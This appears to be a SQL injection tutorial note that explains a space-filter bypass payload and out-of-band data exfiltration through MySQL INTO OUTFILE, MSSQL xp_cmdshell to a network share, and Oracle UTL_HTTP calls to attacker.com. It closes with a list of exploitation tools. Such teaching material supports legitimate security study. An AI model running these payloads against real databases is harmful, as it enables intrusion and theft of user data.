ilkinur/tools-examples-use_guideline/examples/sql_injection.md

     The SQL query shows that the spaces are being omitted by code.
 To bypass these protections, we can use URL-encoded characters that represent different types of whitespace or line breaks, such as %09 (horizontal tab), %0A (line feed).
 These characters can replace spaces and still be interpreted correctly by the SQL parser.

 The original payload 1' OR 1=1 -- can be modified to use newline characters instead of spaces, resulting in the payload 1'%0A||%0A1=1%0A--%27+.
 This payload constructs the same logical condition as 1' OR 1=1 -- but uses newline characters to bypass the space filter.

+Techniques in Different Databases

+Out-of-band SQL injection attacks utilise the methodology of writing to another communication channel through a crafted query.
+This technique is effective for exfiltrating data or performing malicious actions when direct interaction with the database is restricted.
+There are multiple commands within a database that may allow exfiltration, but below is a list of the most commonly used in various database systems:

+MySQL and MariaDB

+In MySQL or MariaDB, Out-of-band SQL injection can be achieved using SELECT ...
+INTO OUTFILE or load_file command.
+This command allows an attacker to write the results of a query to a file on the server's filesystem.
+For example:

+SELECT sensitive_data FROM users INTO OUTFILE '/tmp/out.txt';

+An attacker could then access this file via an SMB share or HTTP server running on the database server, thereby exfiltrating the data through an alternate channel.

+Microsoft SQL Server (MSSQL)

+In MSSQL, Out-of-band SQL injection can be performed using features like xp_cmdshell, which allows the execution of shell commands directly from SQL queries.
+This can be leveraged to write data to a file accessible via a network share:

+EXEC xp_cmdshell 'bcp "SELECT sensitive_data FROM users" queryout "\\10.10.58.187\logs\out.txt" -c -T';

+Alternatively, OPENROWSET or BULK INSERT can be used to interact with external data sources, facilitating data exfiltration through OOB channels.

+Oracle

+In Oracle databases, Out-of-band SQL injection can be executed using the UTL_HTTP or UTL_FILE packages.
+For instance, the UTL_HTTP package can be used to send HTTP requests with sensitive data:

+DECLARE
+  req UTL_HTTP.REQ;
+  resp UTL_HTTP.RESP;
+BEGIN
+  req := UTL_HTTP.BEGIN_REQUEST('http://attacker.com/exfiltrate?sensitive_data=' || sensitive_data);
+  UTL_HTTP.GET_RESPONSE(req);
+END;

+SQLMap: SQLMap is an open-source tool that automates the process of detecting and exploiting SQL Injection vulnerabilities in web applications.
+It supports a wide range of databases and provides extensive options for both identification and exploitation.
+You can learn more about the tool here.
+SQLNinja: SQLNinja is a tool specifically designed to exploit SQL Injection vulnerabilities in web applications that use Microsoft SQL Server as the backend database.
+It automates various stages of exploitation, including database fingerprinting and data extraction.
+JSQL Injection: A Java library focused on detecting SQL injection vulnerabilities within Java applications.
+It supports various types of SQL Injection attacks and provides a range of options for extracting data and taking control of the database.
+BBQSQL: BBQSQL is a Blind SQL Injection exploitation framework designed to be simple and highly effective for automated exploitation of Blind SQL Injection vulnerabilities.